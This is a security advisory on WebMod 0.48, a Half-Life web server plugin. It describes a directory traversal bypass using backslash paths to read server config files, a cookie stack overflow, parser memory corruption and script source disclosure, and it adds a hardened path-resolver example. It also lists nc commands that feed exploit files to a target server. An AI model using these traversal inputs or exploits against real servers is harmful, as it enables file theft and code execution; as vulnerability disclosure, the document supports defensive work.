WebMod is "an open source MetaMod plugin which acts as a web server for Half-Life running on the equivalent TCP port of the UDP one used by the game". Multiple vulnerabilities have been discovered in WebMod; these allow remote attackers to crash the server as well as cause it to execute arbitrary code.
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/webmodz-adv.txt
Vulnerable Systems:
* WebMod version 0.48
Directory traversal
WebMod uses an anti-directory traversal check which searches for any "../" pattern in the HTTP request of the client, so it is enough to use a "..\" pattern instead to bypass the check and download any file from the disk where Half-Life is running, including the configuration files of the game server (like ..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg). Note that this bug works only on Windows servers.
From server.cpp:
void clientHandle(int connfd, httpquery_t *query, int tid)
...
    if(strstr(str,"../")) // hack attempt, display index page
    {
        str[0]='\0';
    }
Cookie buffer-overflow
A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a stack-based buffer overflow.
From server.cpp:
void connectHandle(void *data)
{
    char *input;
    char buf[MYSOCK_BUFLEN+1];
    ...
    // j is never checked against MYSOCK_BUFLEN: the copy stops only at ';', '\n' or end of input
    for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)
        buf[j]=input[i];
parser.cpp arbitrary memory writing
The functions in parser.cpp are affected by several memory corruption vulnerabilities with different effects depending on the type of variable/script used. In short, a value longer than MAX_FILE_SIZE (16384) bytes can lead to the writing of custom data to a custom memory address through strcat (auth.w?mode), a NULL pointer (auth.w?redir), an invalid memory access (the rconpass parameter of auth.w), and so on.
Scripts source disclosure
Adding a dot at the end of the requested URI allows the viewing of the script source code instead of executing it. This bug (which should work only on FAT/NTFS filesystems) can be considered a security vulnerability ONLY if the server runs custom scripts.
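As an added example (not WebMod's code), the single-pattern check quoted from server.cpp is shown beside a hardened resolver that treats both separators alike and walks the path segments with a depth counter, so neither "../" nor "..\" can leave the document root; it also rejects the trailing-dot request from the source-disclosure section above. WEBROOT, MAX_SEGS and the function names are assumptions for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define WEBROOT "webroot"   /* assumed document root; not WebMod's own constant */
#define MAX_SEGS 32

/* WebMod's own check as quoted from server.cpp: only "../" is searched for,
   so a "..\" request passes on Windows. Kept here only for contrast. */
bool naive_check_rejects(const char *str)
{
    return strstr(str, "../") != NULL;
}

/* Hardened resolver: treat '\' like '/', walk the segments with a stack so
   ".." can never climb above WEBROOT, and refuse a trailing dot (the
   FAT/NTFS "script.w." source-disclosure case). Must run AFTER any
   percent-decoding. Fills out[] with the resolved path on success. */
bool resolve_under_root(const char *uri, char *out, size_t outlen)
{
    char tmp[1024];
    const char *segs[MAX_SEGS];
    int depth = 0;

    if (strlen(uri) >= sizeof tmp)
        return false;
    strcpy(tmp, uri);
    for (char *p = tmp; *p; p++)
        if (*p == '\\')
            *p = '/';
    for (char *seg = strtok(tmp, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0)
            continue;
        if (strcmp(seg, "..") == 0) {
            if (depth == 0)                /* would escape the root */
                return false;
            depth--;
            continue;
        }
        if (seg[strlen(seg) - 1] == '.' || depth == MAX_SEGS)
            return false;
        segs[depth++] = seg;
    }
    size_t used = (size_t)snprintf(out, outlen, "%s", WEBROOT);
    for (int i = 0; i < depth && used < outlen; i++)
        used += (size_t)snprintf(out + used, outlen - used, "/%s", segs[i]);
    return used < outlen;
}
```

A production server should additionally resolve the result with the platform's canonical-path call (realpath/GetFullPathName) and confirm the WEBROOT prefix, since this lexical check cannot see symlinks or junctions.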
Exploits:
webmodz1.txt:
nc SERVER PORT -v -v < webmodz1.txt
webmodz2.txt:
nc SERVER PORT -v -v < webmodz2.txt
webmodz3.txt:
nc SERVER PORT -v -v < webmodz3.txt
webmodz4.txt:
nc SERVER PORT -v -v < webmodz4.txt